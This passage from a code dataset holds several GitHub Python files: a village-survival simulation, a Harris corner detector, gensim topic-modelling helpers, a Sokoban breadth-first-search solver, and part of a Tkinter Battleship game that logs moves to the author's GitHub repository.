self.newdead - self.newrecovered\n self.popdead += self.newdead\n\n def newIll(self):\n return self.weatherCold*3 # placeholder !!\n\n def newDead(self):\n dead = 0\n recover = 0\n for i in range(self.popill):\n if self.herbs > 0:\n self.herbs -= 1\n recover += 1\n else:\n dead += 1\n\n\n return dead, recover\n \"\"\"\n \n\n def weatherMake(self):\n # weather / \n yeet = random.randint(1,40)\n yote = random.randint(1,40)\n \"\"\"\n self.weatherPrecip=0 # dry\n self.weatherWind=0 # calm\n self.weatherCold=0 # mild\n \"\"\"\n\n self.precip = yeet+self.day # ranges from 0-70 day 0, to 30-100 day 30\n \"\"\"\n if precip > 60:\n self.weatherPrecip = 2 # snow\n elif precip > 30:\n self.weatherPrecip = 1 # rain\n \"\"\"\n self.wind = yote+self.day # ranges from 0-70 day 0, to 30-100 day 30\n\n \"\"\"\n if wind > 60:\n self.weatherWind = 2 # gale\n elif wind > 30:\n self.weatherWind = 1 # breezy\n \"\"\"\n\n self.cold = (self.precip + self.wind)*0.75# ranges from 0-70 day 0, to 30-100 day 30 // now 0-105 tending to 52\n\n \"\"\"\n if cold > 80:\n self.weatherCold = 4 # deathly\n elif cold > 60:\n self.weatherCold = 3 # freezing\n elif cold > 40:\n 
self.weatherCold = 2 # brisk\n elif cold > 20:\n self.weatherCold = 1 # chilly\n \"\"\"\n \n \n \n return\n \n\n\n \n \ndef main():\n\n \n\n \"\"\"\n print(game.crier.widow)\n print(game.crier.like)\n game.crier.statchange(\"like\",1)\n print(game.crier.like)\n print(game.crier.widow)\n game.crier.relchange(game.widow,9)\n print(game.crier.widow)\n print(game.widow.crier)\n\n print(game.__dict__)\n print(game.foodstuffs())\n game.reschange(\"fish\",-22)\n print(game.foodstuffs())\n\n print(game.crier.name)\n\n print(game.day)\n game.advanceDay(game)\n\n print(game.day)\n print(game.adjectiveWind[game.weatherWind])\n print(game.adjectivePrecip[game.weatherPrecip])\n print(game.adjectiveCold[game.weatherCold])\n\n\n print(game.characters)\n for i in range(len(game.peasants)):\n print(game.peasants[i].__dict__)\n\n print(len(game.workers))\n print(len(game.children))\n print(len(game.elders))\n\n \"\"\"\n\n def display(x,occ=False):\n if occ == True:\n print(\" __ __ __ \" + str((x[0].occupation)) + \" __ __ __\")\n else:\n print(\" __ __ __ Workers __ __ __\")\n for i in range(len(x)):\n print(x[i].__dict__)\n \"\"\"\n display(game.hunters,True)\n display(game.foragers,True)\n display(game.gatherers,True)\n display(game.fishermen,True)\n display(game.genworkers,True)\n\n display(sorted(game.workers, key=lambda x: x.occupation, reverse=True))\n\n \"\"\"\n class statistics:\n def __init__(self,game):\n self.currenthealths = []\n self.currenthealths.append([peasant.currenthealth for peasant in game.peasants])\n self.avghealth = []\n self.avghealth.append(sum(self.currenthealths[0])/len(self.currenthealths[0]))\n self.popalive = []\n self.popalive.append(100-game.popDead)\n\n def update(self,i):\n self.currenthealths.append([peasant.currenthealth for peasant in game.peasants])\n self.avghealth.append(sum(self.currenthealths[i+1])/len(self.currenthealths[i+1]))\n self.popalive.append(100-game.popDead)\n\n \n\n def daynightcycle(number):\n choices = [\"hunt\", \"fish\", \"forage\", \"gather\"]\n game.weatherMake()\n game.playerHarvest(choices[random.randint(1,4)-1],number)\n game.advanceDay()\n game.updateFood()\n game.updateFuel()\n game.updateHerb()\n game.advanceNight()\n\n import matplotlib.pyplot as plt\n \n def openplot(ax,x,y,ylabel):\n ax.plot(x, y)\n\n ax.set(xlabel='time (days)', ylabel=ylabel,\n title='')\n ax.grid()\n time = range(30)\n stats = {}\n ax1 = plt.subplot(211)\n\n ax2 = plt.subplot(212, sharex=ax1)\n\n for j in range(100):\n game = Game()\n stats[j] = statistics(game)\n for i in range(29):\n daynightcycle(5)\n stats[j].update(i)\n openplot(ax1,time,stats[j].avghealth,ylabel='Average health of VILLAGE')\n openplot(ax2,time,stats[j].popalive,ylabel='surviving pop of VILLAGE')\n\n plt.show()\n \n \n print([stat.avghealth for stat in stats.values()])\n\n \n#main()", "repo_name": "jebblewhite/sun_sun_nosun", "sub_path": "game/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 27981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.gauss", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 61, "usage_type": "call"}, {"api_name": "random.randint", 
"line_number": 63, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 65, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 67, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 69, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 155, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 186, "usage_type": "call"}, {"api_name": "math.log", "line_number": 293, "usage_type": "call"}, {"api_name": "math.log", "line_number": 315, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 351, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 409, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 428, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 438, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 478, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 507, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 510, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 513, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 516, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 524, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 559, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 576, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 594, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 620, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 659, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 660, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 780, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 797, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 797, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 799, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 799, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 810, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 810, "usage_type": "name"}]} +{"seq_id": "41762676547", "text": "# python version\n\nimport cv2 \nimport numpy as np\nimport time\n\nimg_color = cv2.imread('chessboard.jpg', cv2.IMREAD_COLOR)\nimg_gray = cv2.imread('chessboard.jpg', cv2.COLOR_BGR2GRAY)\n\nimg_sobel_x = cv2.Sobel(img_gray, cv2.CV_32F,1,0)\nimg_sobel_y = cv2.Sobel(img_gray, cv2.CV_32F,0,1)\n\nlxlx = img_sobel_x * img_sobel_x\nlyly = img_sobel_y * img_sobel_y\nlxly = img_sobel_x * img_sobel_y\n\nh, w = img_color.shape[:2]\n\nwindow_size = 5\noffset = int(window_size/2)\n\nr = np.zeros(img_gray.shape)\n\nstart = time.perf_counter()\nfor y in range(offset, h - offset):\n for x in range(offset, w - offset):\n window_lxlx = lxlx[y-offset: y+offset +1 , x-offset : x+offset + 1]\n window_lyly = lyly[y-offset: y+offset +1 , x-offset : x+offset + 1]\n window_lxly = lxly[y-offset: y+offset +1 , x-offset : x+offset + 1]\n \n\n Mxx = window_lxlx.sum()\n Myy = window_lyly.sum()\n Mxy = window_lxly.sum()\n\n \n det = Mxx * Myy - Mxy*Mxy\n trace = Mxx + Myy\n\n r[y,x] = det - 0.04*(trace **2)\n print(r[y,x])\n\n \ncv2.normalize(r, r, 0.0 , 1.0 , cv2.NORM_MINMAX)\n\nfor y in range(offset, h -offset):\n for x in range(offset, w -offset):\n \n if r[y, x][0] > 0.4:\n img_color.itemset((y,x,0), 0)\n img_color.itemset((y,x,1), 0)\n 
img_color.itemset((y,x,2), 255)\n\nend = time.perf_counter()\nprint(end - start)\n\ncv2.imshow('original', img_color)\ncv2.waitKey()\ncv2.destroyAllWindows()", "repo_name": "FLY-CODE77/opencv", "sub_path": "project/MAV_DIS/Harris_corner.py", "file_name": "Harris_corner.py", "file_ext": "py", "file_size_in_byte": 1476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.CV_32F", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.CV_32F", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 44, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "17376400910", "text": "import numpy as np\nimport pandas as pd\nimport spacy\nfrom gensim import corpora\nfrom gensim.models import Phrases, CoherenceModel, LdaModel\nfrom gensim.models.phrases import Phraser\nfrom gensim.models.wrappers import LdaMallet\n\nfrom matplotlib import pyplot as plt\n\nmallet_path = r'/Users/annalisa/PycharmProjects/TopicModeling/newsgroup/mallet-2.0.8/bin/mallet'\n\nnlp = spacy.load('en_core_web_lg', disable=['parser', 'ner'])\nspacy.load('en_vectors_web_lg', vocab=nlp.vocab)\nnlp.max_length = 1500000\n\nstopwords = nlp.Defaults.stop_words | {'re', 'rt', 'co', 'amp'}\n\nwords_to_exclude = ['glasgow', 'newcastle', 'durham', 'wrexham', 'swansea', 'bristol', 'hull', 'walthamstow', 'york',\n 'plymouth',\n 'battersea', 'cambridge', 'middlesbrough', 'wolverhampton', 'leeds', 'sunderland', 'portsmouth',\n 'croydon',\n 'cardiff', 'peterborough', 'oxford', 'edinburgh', 'greater_manchester', 'newport', \"cardiff\",\n \"salford\",\n 'brighton', 'nottingham', 'slough', 'hartlepool', 'lancashire', 'ealing', 'stoke_trent', 'oldham',\n 'blackpool', 'north_east', 'west_midlands', 'lincoln', 'bardford', 'barnsley', 'leichester',\n 'hull_north',\n 'bolton', 'harrow', 'newport_west', 'stoke', 'welsh', 'scottish', 'sheffield', 'chorley',\n 'grimsby',\n 'ipswich', 'colchester', 'northampton', 'swindon', 'worchester', 'southampton', 'northumberland',\n 'kent',\n 'essex', 'plymouth', 'west_midlands', 'dover', 'watford', 'cornwall', 'wimbledon', 'plymouth',\n 'gloucester',\n 'norwich', 'telford', 'redditch', 'norfolk', 'ashford', 'crawley', 'southend', 'worcester',\n 'stevenage',\n 'shrewsbury', 'fulham', 'shropshire', 'chelsea', 'suffolk', 'salisbury', 'dorset', 'chelmsford',\n 'devon',\n 'worcestershire', 'south_west', 'yorkshire', 'derbyshire', 'bournemouth', 'manchester', 'morley',\n 'medway',\n 'lewisham', 'preston', 'stockton', 'newham', 'chesterfield',\n 'bradford', 'huddersfield', 
'lancaster', 'morecambe', 'humpshire', 'sussex', 'stafford',\n 'liverpool', 'ogmore',\n 'cheltenham', 'birmingham', 'surrey', 'bath', 'sutton', 'brecon', 'hampshire', 'dewsbury',\n 'leicester', 'rotherham', 'stroud', 'gower', 'wigan', 'wakefield', 'bridgend', 'llanelli', 'bury', 'canterbury']\n\n\ndef lemmatization(list_of_docs): # returns lemma only of nouns, adj, verbs and adv\n keep_tags = ['NOUN', 'ADJ', 'VERB', 'ADV', 'PROPN']\n lemmatized_text = []\n for sent in list_of_docs:\n # doc = nlp(\" \".join(sent)) # we need to pass a string of words, not a list\n doc = nlp(sent) # we need to pass a string of words, not a list\n lemmatized_text.append(\n [token.lemma_.lower() for token in doc if\n token.pos_ in keep_tags and token.is_alpha and len(\n token.lemma_) > 1 and token.lemma_.strip().lower() not in stopwords])\n # is_apha removes number, punctuation and urls\n print(f\"{len(lemmatized_text)} sentences lemmatized\")\n # print(lemmatized_text[0])\n return lemmatized_text\n\n\n# takes a list of lemmatized words\ndef make_bigrams(text):\n bigram_model = Phraser(Phrases(text, min_count=5, threshold=100))\n return [bigram_model[doc] for doc in text]\n\n\n# creates a list of coherence scores (umass and cv) for mallet models\n\ndef coh_mallet(max_topic, corpus, id2word, docs_bigrams):\n umass_mallet = []\n cv_mallet = []\n for nb_topics in range(1, max_topic + 1):\n lda = LdaMallet(mallet_path, corpus=corpus, id2word=id2word, num_topics=nb_topics, random_seed=1)\n cohm = CoherenceModel(model=lda, corpus=corpus, dictionary=id2word, coherence='u_mass').get_coherence()\n coh_cv = CoherenceModel(model=lda, texts=docs_bigrams, dictionary=id2word, coherence='c_v').get_coherence()\n umass_mallet.append(cohm)\n cv_mallet.append(coh_cv)\n print(nb_topics, \" u_mass : \", cohm, \" - c_v : \", coh_cv)\n return umass_mallet, cv_mallet\n\n\n# creates a plot with coherence values\ndef plot_coh_scores(x, y, ylabel):\n plt.figure(figsize=(10, 5))\n plt.plot(x, y)\n plt.xlabel(\"Number of Topics\")\n plt.ylabel(ylabel)\n plt.show()\n\n\n# convert the mallet model to a regular LDA gensim model, in order to perform the visualization\ndef convertldaMalletToldaGen(mallet_model):\n model_gensim = LdaModel(\n id2word=mallet_model.id2word, num_topics=mallet_model.num_topics,\n alpha=mallet_model.alpha)\n model_gensim.state.sstats[...] 
= mallet_model.wordtopics\n model_gensim.sync_state()\n return model_gensim\n\n\n# creates a dataframe with the word-topics\ndef term_doc_df(lda, nr_words=20):\n # top 20 significant terms and their probabilities for each topic :\n topics = [[(term, round(wt, 3)) for term, wt in lda.show_topic(n, topn=nr_words)] for n in\n range(0, lda.num_topics)]\n\n # dataframe for term-topic matrix:\n topics_df = pd.DataFrame([[term for term, wt in topic] for topic in topics],\n columns=['Term ' + str(i) for i in range(1, nr_words + 1)],\n index=['Topic ' + str(t) for t in range(1, lda.num_topics + 1)]).T\n return topics_df\n\n\n# DOMINANT TOPIC FOR EACH DOCUMENT\ndef main_topic_doc_df(LdaMallet, corpus, df):\n # distribution of topics per each document\n tm_distribution = LdaMallet[corpus]\n # Dominant topic per each document\n sorted_topic_distr = [sorted(topics, key=lambda record: -record[1])[0] for topics in tm_distribution]\n\n # create an empty dataframe\n topics_docs_df = pd.DataFrame()\n # get the screen_names from the original dataframe\n topics_docs_df['screen_name'] = df.screen_name\n topics_docs_df['main_topic'] = [item[0] + 1 for item in sorted_topic_distr]\n topics_docs_df['%_contribution'] = [round(item[1] * 100, 2) for item in sorted_topic_distr]\n # corpus_topic_df['Topic_term'] = [topics_df.iloc[t[0]]['term_per_topic'] for t in corpus_topics]\n return topics_docs_df\n\n\n# from a list of lemmatized tokens, returns dictionary and corpus to use with lda model\ndef dict_corpus(lemmas, excluded_words):\n # exclude some locations from the words/bigrams\n lemmas = [[word for word in sent if word not in excluded_words] for sent in lemmas]\n\n # create dictionary\n id2word = corpora.Dictionary(lemmas)\n\n # Filter out words that occur less than 10 documents, or more than 50% of the documents.\n # no_below : Keep tokens which are contained in at least `no_below` documents. no_above : Keep tokens which are\n # contained in no more than `no_above` documents (fraction of total corpus size, not an absolute number). 
keep_n :\n # Keep only the first `keep_n` most frequent tokens.\n id2word.filter_extremes(no_below=10, no_above=0.5)\n corpus = [id2word.doc2bow(doc) for doc in lemmas]\n return id2word, corpus\n\n\n# GROUP BY TOPICS - from a dataframe with distribution of topics, returns the sum of main topic occurrence per each\n# document\ndef freq_topic_df(corpus_topic_df, corpus):\n freq_topic_df = corpus_topic_df.groupby('topic_name').agg(\n total_docs=('topic_name', np.size),\n docs_perc=('topic_name', np.size)).reset_index()\n\n freq_topic_df['docs_perc'] = freq_topic_df['docs_perc'].apply(\n lambda row: round((row * 100) / len(corpus), 2))\n return freq_topic_df\n", "repo_name": "annalisamf/msc-computer-science-project", "sub_path": "topic_model/tm_utils.py", "file_name": "tm_utils.py", "file_ext": "py", "file_size_in_byte": 7649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "spacy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "spacy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "gensim.models.phrases.Phraser", "line_number": 65, "usage_type": "call"}, {"api_name": "gensim.models.Phrases", "line_number": 65, "usage_type": "call"}, {"api_name": "gensim.models.wrappers.LdaMallet", "line_number": 75, "usage_type": "call"}, {"api_name": "gensim.models.CoherenceModel", "line_number": 76, "usage_type": "call"}, {"api_name": "gensim.models.CoherenceModel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "gensim.models.LdaModel", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "gensim.models.wrappers.LdaMallet", "line_number": 119, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 139, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.size", "line_number": 154, "usage_type": "attribute"}, {"api_name": "numpy.size", "line_number": 155, "usage_type": "attribute"}]} +{"seq_id": "41815233891", "text": "from collections import deque\nclass State:\n def __init__(self, player, boxes, board, boxes_left):\n self.player = player\n self.boxes = boxes\n self.board = board\n self.boxes_left = boxes_left\n self.height = len(board)\n self.width = len(board[0])\n # self.print_state()\n def print_board(self):\n for row in self.board:\n for col in row:\n print(col, end = \"\")\n print(\"\")\n def print_state(self):\n print(\"Player: {}\".format(self.player))\n print(\"Boxes: {}\".format(self.boxes))\n print(\"Boxes left: {}\".format(self.boxes_left))\n self.print_board()\n 
def get_repr(self):\n return (self.player, tuple(self.boxes))\n\n def __hash__(self):\n return hash(self.get_repr())\n\n def __eq__(self, other):\n if isinstance(other, State):\n return self.get_repr() == other.get_repr()\n return False\n\n def is_solved(self):\n return self.boxes_left == 0\n\n def is_push_valid(self, pos, dir):\n new_pos = add_pos(pos, dir)\n if new_pos[0] < 0 or new_pos[1] < 0 or new_pos[0] >= self.height or new_pos[1] >= self.width:\n return False\n if new_pos in self.boxes:\n return False\n return self.board[new_pos[0]][new_pos[1]] != 'W'\n\n def is_move_valid(self, dir):\n new_pos = add_pos(self.player, dir)\n if new_pos[0] < 0 or new_pos[1] < 0 or new_pos[0] >= self.height or new_pos[1] >= self.width:\n return False\n if new_pos in self.boxes:\n return self.is_push_valid(new_pos, dir)\n return self.board[new_pos[0]][new_pos[1]] != 'W'\n\n def generate_state(self, dir):\n # print(\"self.player: {}\".format(self.player))\n # print(\"dir: {}\".format(dir))\n new_pos = add_pos(self.player, dir)\n # print(\"new_pos: {}\".format(new_pos))\n if new_pos in self.boxes:\n # print(\"pushed\")\n boxes = self.boxes[:]\n box_pos = add_pos(new_pos, dir)\n boxes[boxes.index(new_pos)] = box_pos\n boxes_left = self.boxes_left - int(self.board[box_pos[0]][box_pos[1]] == 'G') + int(self.board[new_pos[0]][new_pos[1]] == 'G')\n return State(new_pos, boxes, self.board, boxes_left)\n return State(new_pos, self.boxes, self.board, self.boxes_left)\n\n def get_neighbours(self):\n neighbors = []\n for dir in [(-1, 0), (1, 0), (0, 1), (0, -1)]:\n # print(dir)\n if self.is_move_valid(dir):\n new_state = self.generate_state(dir)\n neighbors.append(new_state)\n # else:\n # print(\"Player: {} Boxes: {} Dir: {}\".format(self.player, self.boxes, dir))\n return neighbors\n\ndirections_dict = {( 1, 0) : \"D\",\n (-1, 0) : \"U\",\n ( 0, 1) : \"R\",\n ( 0, -1) : \"L\"}\n\ndef add_pos(pos1, pos2):\n return (pos1[0] + pos2[0], pos1[1] + pos2[1])\n\ndef diff_pos(pos1, pos2):\n return (pos1[0] - pos2[0], pos1[1] - pos2[1])\n\ndef construct_path(prev_state_map, cur_state):\n path = []\n while cur_state is not None:\n temp = cur_state\n cur_state = prev_state_map[cur_state]\n if cur_state is not None:\n path.append(directions_dict[diff_pos(temp.player, cur_state.player)])\n return list(reversed(path))\n\ndef get_step_path(initial_state):\n states_queue = deque([initial_state])\n prev_state_map = {initial_state: None}\n while len(states_queue) > 0:\n cur_state = states_queue.popleft()\n # cur_state.print_state()\n if cur_state.is_solved():\n return construct_path(prev_state_map, cur_state)\n neighbors = cur_state.get_neighbours()\n for neighbor in neighbors:\n # neighbor.print_state()\n if neighbor not in prev_state_map:\n # print(\"added state\")\n prev_state_map[neighbor] = cur_state\n states_queue.append(neighbor)\n # print(\"checkpoint 1\")\n return []\n\ndef print_solution(step_path, ofile):\n for step in step_path:\n ofile.write(step)\n ofile.write(\"\\n\")\n\ndef main():\n with open(\"zad_input.txt\") as ifile:\n with open(\"zad_output.txt\", \"w\") as ofile:\n board = [list(line[:-1]) for line in ifile]\n player = (0,0)\n boxes = []\n boxes_left = 0\n for i in range(len(board)):\n for j in range(len(board[i])):\n if board[i][j] == \"K\":\n board[i][j] = \".\"\n player = (i, j)\n elif board[i][j] == \"+\":\n board[i][j] = \"G\"\n player = (i, j)\n elif board[i][j] == \"B\":\n board[i][j] = \".\"\n boxes_left += 1\n boxes.append((i, j))\n elif board[i][j] == \"*\":\n board[i][j] = \"G\"\n boxes.append((i, 
j))\n initial_state = State(player, boxes, board, boxes_left)\n step_path = get_step_path(initial_state)\n # print(step_path)\n print_solution(step_path, ofile)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Nerd911/University", "sub_path": "Sztuczna_Inteligencja/Lista2/zad2.py", "file_name": "zad2.py", "file_ext": "py", "file_size_in_byte": 5281, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "322274354", "text": "import random\nimport os\nimport time\nfrom tkinter import *\nfrom tkinter import font\nfrom tkinter import messagebox\nfrom functools import partial\nfrom util_for_saving_data import *\n\nTOKEN = os.environ['GITHUB_TOKEN']\nfile_path = \"Jinav22/Battleship_RIDS\"\nfile_name = \"data.txt\"\n\nframes = []\nBOARD_SIZE = 8\n\ndata1 = ''\ndata2 = ''\nhuman_ship_pos = []\nbot_ship_pos = []\nmoves_h = []\nmoves_b = []\nhits = []\nstrategy = False\n\nclass Ship:\n def __init__(self, name, size):\n self.name = name\n self.size = size\n self.position = {}\n self.sunk = False\n\n\nclass Player:\n def __init__(self, parent, name, auto=False, text=''):\n self.parent = parent\n self.name = name\n self.text = text\n self.auto = auto\n self.label = None\n self.status = None\n # self.wins = 0\n # self.losses = 0\n # self.ties = 0\n self.reset()\n\n def reset(self):\n global frames\n self.initShips()\n self.sunk = 0\n self.board = [[' ' for _ in range(BOARD_SIZE)] for _ in range(BOARD_SIZE)]\n self.valid = []\n for i in range(BOARD_SIZE):\n for j in range(BOARD_SIZE):\n self.valid += [[i, j]]\n self.turn = 0\n if len(frames) > 2:\n frames[-2].grid_forget()\n frames[-1].grid_forget()\n self.boardReset()\n\n # self.initShipPositions()\n\n def initShips(self):\n self.ships = []\n self.ships += [Ship(\"Carrier\", 5)]\n self.ships += [Ship(\"Battleship\", 4)]\n self.ships += [Ship(\"Submarine\", 3)]\n self.ships += [Ship(\"Cruiser\", 3)]\n self.ships += [Ship(\"Destroyer\", 2)]\n #\n # def win(self):\n # self.wins += 1\n #\n # def loss(self):\n # self.losses += 1\n #\n # def tie(self):\n # self.ties += 1\n #\n # def stats(self):\n # return [self.wins, self.ties, self.losses]\n\n # Randomly place the ships on the board. 
Searches for a valid location.\n # A valid location is a location where the ship fits completely on the board.\n # Also the ship must be in a location that is not already occupied by another ship\n def initShipPositions(self):\n for currentShip, ship in enumerate(self.ships):\n found = False\n while not found:\n ship.position = {}\n i = random.randint(0, len(self.valid) - 1)\n t = self.valid[i]\n x = t[0]\n y = t[1]\n # Try to place the ship horizontally or vertically\n # Trying horizontal or vertical placement first is random\n j = random.randint(0, 1)\n for k in range(2):\n count = 1\n x1 = x\n y1 = y\n ship.position = {}\n found = True\n for i in range(ship.size):\n if j % 2 == 0:\n x1 = x + i\n else:\n y1 = y + i\n if [x1, y1] not in self.valid:\n found = False\n break\n # Check to see if a ship already exists in this position\n for foundShips in range(currentShip):\n if (x1, y1) in self.ships[foundShips].position:\n found = False\n break\n if not found:\n break\n ship.position[(x1, y1)] = 1\n if found:\n break\n j += 1\n # print(f\"{ship.name} is in {ship.position}\")\n bot_ship_pos.append(list(ship.position.keys()))\n self.printBoard()\n\n def printBoard(self):\n for i in range(BOARD_SIZE):\n #print(self.board[i])\n pass\n\n # Check our list of valid remaining moves to see if the move is valid\n def checkMove(self, x, y):\n if [x, y] in self.valid:\n return True\n return False\n\n # Resets the GUI board for the player\n def boardReset(self):\n for x in range(BOARD_SIZE):\n for y in range(BOARD_SIZE):\n self.buttons[x][y].configure(image=game.blank, compound=\"left\")\n self.status.configure(text=\"Setup\", fg=\"blue\", bg=\"white\")\n\n # Creates the GUI board for the player\n def boardInit(self):\n self.buttons = []\n for x in range(BOARD_SIZE):\n self.buttons += [[]]\n for y in range(BOARD_SIZE):\n if self.auto:\n self.buttons[x] += [Button(frames[-1], text=\"\", image=game.blank, borderwidth=1,\n command=partial(self.parent.tkplaceships, x, y, root))]\n else:\n self.buttons[x] += [Button(frames[-1], text=\"\", image=game.blank, borderwidth=1,\n command=partial(self.parent.tkmove, x, y, root))]\n self.buttons[x][y].grid(row=x, column=y)\n\n # Prompts user in the GUI. Returns True if the user wants to play again, otherwise False\n def playAgain(self):\n return messagebox.askyesno(\"Game Over\",\n f\"{self.name} wins! All ships were sunk in {self.turn} turns. 
Would you like to play again?\")\n\n\n # Display appropriate messages\n # If all ships were sunk, ask if the player wants to play again\n # Reset the game if the player wants to play again\n # Take action to end the game if the player does not want to play again\n # If ships still remain, inform the player that the ship was sunk.\n def shipWasSunkMessages(self, ship):\n global data1\n global data2\n\n #print(f\"{ship.name} was sunk!!\")\n if self.sunk == 5:\n repository = github_setup(TOKEN, file_path)\n for i in human_ship_pos:\n data1 += ('\\\"' + ','.join([str(j) for j in i]) + '\\\"' + ',')\n\n data1 += ('\\\"' + ','.join([str(i) for i in moves_h]) + '\\\"' + ',')\n data1 += 'Human'\n\n #print(data1)\n update_data, commit_message = update_github_file(repository, file_name, data1)\n #push(repository, file_name, commit_message, update_data)\n\n repository = github_setup(TOKEN, file_path)\n for i in bot_ship_pos:\n data2 += '\\\"' + ','.join([str(j) for j in i]) + '\\\"' + ','\n\n data2 += ('\\\"' + ','.join([str(i) for i in moves_b]) + '\\\"' + ',')\n\n data2 += 'Bot'\n\n data, commit_message = update_github_file(repository, file_name, data2)\n #push(repository, file_name, commit_message, data)\n\n print(update_data, data)\n\n if self.playAgain():\n self.parent.reset()\n self.boardReset()\n else:\n self.parent.status = 'Over'\n root.destroy()\n else:\n self.status.configure(text=f\"{ship.name} was sunk!\", bg=\"white\", fg=\"red\")\n self.status2.configure(text=f\"Ships intact: {5-self.sunk}\", fg=\"blue\", bg=\"white\")\n return True\n\n # Returns False if the ship was already sunk or if unhit sections of the ship remain\n # Returns True if the ship was sunk\n def isSunk(self, ship):\n if ship.sunk:\n return False\n for k in ship.position.keys():\n if list(k) in self.valid:\n return False\n ship.sunk = True\n self.sunk += 1\n return True\n\n def move(self, x, y, s, p):\n global strategy\n\n self.board[x][y] = s\n self.valid.pop(self.valid.index([x, y]))\n self.turn += 1\n foundHit = False\n for ship in self.ships:\n if ship.sunk == False and (x, y) in ship.position:\n self.buttons[x][y].configure(image=self.parent.hit, compound=\"left\")\n self.status.configure(text=f\"{ship.name} was hit!\", bg=\"white\", fg=\"red\")\n foundHit = True\n SUNK = self.isSunk(ship)\n if p == \"bot\":\n hits.append([x, y])\n strategy = True\n strategy = (strategy and not SUNK)\n #print(ship, self.isSunk(ship))\n if SUNK:\n self.shipWasSunkMessages(ship)\n if foundHit and p == \"bot\":\n moves_b.append([x, y, ship.name])\n if foundHit and p == \"human\":\n moves_h.append([x, y, ship.name])\n break\n\n if not foundHit:\n if p == \"bot\":\n moves_b.append([x, y, '-'])\n if p == \"human\":\n moves_h.append([x, y, '-'])\n\n self.buttons[x][y].configure(image=self.parent.miss, compound=\"left\")\n self.status.configure(text=f\"Miss.\", 